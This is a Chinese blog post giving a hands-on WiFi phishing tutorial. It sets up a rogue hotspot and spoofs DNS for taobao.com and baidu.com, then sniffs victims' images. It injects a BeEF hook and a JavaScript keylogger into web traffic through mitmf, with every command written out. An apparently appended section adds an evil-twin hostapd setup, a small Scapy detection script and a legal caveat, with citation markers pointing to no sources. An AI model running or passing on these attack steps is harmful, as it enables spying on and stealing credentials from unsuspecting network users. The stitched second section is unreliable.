WiFi钓鱼

WiFi钓鱼

建立热点

工具:isc-dhcp-server  ;Aircrack-ng套件;iptables

建立过程:

首先写dhcp配置文件/etc/dhcp/dhcpd.conf 

写入如下内容:

authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name-servers 10.0.0.1;

range 10.0.0.10 10.0.0.100;

}

这里以10.0.0.1作为网关和dns服务器地址。

然后我们处理无线网卡

ifconfig wlan1 down           #wlan1修改成你的网卡
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airmon-ng start wlan1

上述命令可以防止出现:Error: Got channel -1, expected a value > 0.

然后用airbase建立热点

airbase-ng -e Fishing -c 11 mon0

热点的网络流量会被虚拟到at0这块网卡上面

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

打开ip转发

echo 1 > /proc/sys/net/ipv4/ip_forward

开启dhcp

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
service isc-dhcp-server start

然后可以试着用手机连接,应该可以连上但上不了网

于是配置NAT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356 #修改最大报文段长度

劫持DNS

工具:dnschef

过程:

dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53

上述命令是以ip10.0.0.1(上文中的fakeap网关和DNS的ip)建立dns,对于所有请求转发到210.73.64.1进行解析。显然这只是个“代理”并没有劫持的功效

于是我们进化:

dnschef --fakedomains=taobao.com,baidu.com --fakeip=10.0.0.1 -i 10.0.0.1 --nameserver 210.73.64.1#53

把淘宝和百度解析到本机了。

 

图片嗅探

这是一个很好玩的功能

工具:driftnet

过程:

driftnet -i at0

单击图片保存到/

当然可以开启 Adjunct mode:

driftnet -i at0 -a

直接保存图片并显示文件名。

 

 

劫持Web流量

工具:BEEF;mitmf;iptables

过程:

先把80端口的流量劫持走(这里10000是mitmf默认监听端口)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

然后打开mitmf

mitmf -i at0 --replace --search-str aaaaa  --replace-str bbbbb#把所有网页中的aaaaa替换成bbbbb
mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger

mitmf在这里注入了js键盘记录器

posted @ 2018-01-10 19:22 journeyIT 阅读( ...) 评论( ...) 编辑 收藏
### 设置或检测 WiFi 钓鱼攻击的方法 #### 工具准备 为了在 Ubuntu 系统上实现 WiFi 钓鱼攻击或对其进行检测,通常需要用到一些网络协议分析工具以及无线网络管理工具。例如 Wireshark 是一种强大的网络协议分析器[^2],可用于捕获和分析网络流量。 #### 实现 WiFi 钓鱼攻击的步骤概述 WiFi 钓鱼攻击的核心在于创建一个伪装成合法热点的虚假接入点 (AP),并诱导目标连接到此 AP 后窃取其敏感数据。以下是可能的技术手段: 1. **配置虚拟无线网卡** 使用 `airmon-ng` 命令启动监听模式来模拟一个伪造的无线接入点。 ```bash sudo airmon-ng start wlan0 ``` 2. **建立假热点** 利用 Hostapd 创建一个与真实热点名称相同的 SSID 来欺骗用户。 编辑 `/etc/hostapd/hostapd.conf` 文件如下: ```plaintext interface=wlan0mon driver=nl80211 ssid=FreePublicWifi hw_mode=g channel=6 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 ``` 运行 Hostapd 并指定上述配置文件: ```bash sudo hostapd /etc/hostapd/hostapd.conf ``` 3. **拦截 HTTP 流量** 结合 DNS Spoofing 技术重定向用户的请求至恶意页面收集凭证等信息。可借助 Ettercap 完成 ARP 欺骗及后续操作。 4. **日志记录与数据分析** 对整个过程中的通信行为进行监控记录以便进一步研究利用价值高的情报资料。 #### 检测 WiFi 钓鱼攻击的方式 对于防御方面,则主要依赖于主动扫描周围环境是否存在可疑信号源以及教育员工提高警惕意识等方面工作开展起来比较复杂些;但从技术角度来看,可以通过部署入侵检测系统 IDS/IPS 设备或者定期执行专项审计任务等方式加强防护力度。 ##### 使用 Wireshark 捕捉异常包 通过过滤特定类型的帧如 Beacon Frame 和 Probe Response Frame 查找不符合常规规律之处进而判断是否有潜在威胁存在其中。 ##### 自动化脚本编写实例 下面给出一段简单的 Python 脚本来演示如何基于 Scapy 库构建基础版探测机制: ```python from scapy.all import * def packet_handler(pkt): if pkt.haslayer(Dot11Beacon): # 只处理信标帧 print(f"Detected AP with SSID {pkt.info.decode()}") sniff(iface="wlan0", prn=packet_handler, store=False) ``` #### 注意事项 任何未经授权擅自实施此类活动均属违法行为,请务必遵循当地法律法规,在授权范围内合理使用相关技能和技术资源完成相应职责范围内的工作任务即可[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值